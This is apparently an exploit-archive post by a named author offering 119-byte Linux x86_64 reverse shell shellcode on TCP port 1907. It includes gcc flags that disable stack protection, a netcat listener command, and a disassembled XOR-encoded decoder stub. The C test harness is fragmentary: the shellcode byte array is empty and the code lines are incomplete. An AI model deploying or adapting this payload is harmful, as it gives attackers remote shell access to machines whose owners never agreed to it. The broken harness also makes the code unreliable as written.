reverse shell tcp (1907) port shellcode C language - Linux/x86_64
Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 119 bytes
compilation: gcc -fno-stack-protector -z execstack reverse-shell.c -o reverse-shell
run your machine: nc -vlp 1907
and run exploit (./reverse-shell)
check shellcode raw and test ls, who, pwd command.
assembly code is below:
xor %rcx,%rcx
sub $0xfffffffffffffff6,%rcx
lea -0x11(%rip),%rax # 0x555555558060
movabs $0x28467171b1064bdf,%rbx
xor %rbx,0x27(%rax)
sub $0xfffffffffffffff8,%rax
loop 0x55555555807b
mov $0x62,%ch
pop %rsi
sub %bl,(%rbx)
jae 0x5555555580a7
rex.X ficoms -0x19c64bf7(%rip) # 0x55553b8f349e
xchg %eax,%ecx
fisttpll 0x1(%rbx)
retq $0x710e
rex.RX sub %r9d,0x1b578f03(%rsi)
sbb $0x42,%al
adc (%rcx),%ecx
mov $0x1b,%ah
jb 0x5555555580c6
and %al,0x7e29906c(%rbp)
rex.XB pop %r13
sub %esp,(%rcx)
cmp $0xfd39e8e9,%eax
mov $0x29e6822,%ebp
sbb %eax,0x7b(%rsi)
xchg %eax,%edi
retq $0xe3e1
es cmp %ecx,%edi
rorb 0x6(%rsi)
mov $0x71,%cl
jno 0x55555555811c
sub %al,(%rax)
unsigned char shellproccod[] = \
int main()
printf("Shellcode len: %d\n", strlen(shellproccod));
int (*ret)() = (int(*)())shellproccod;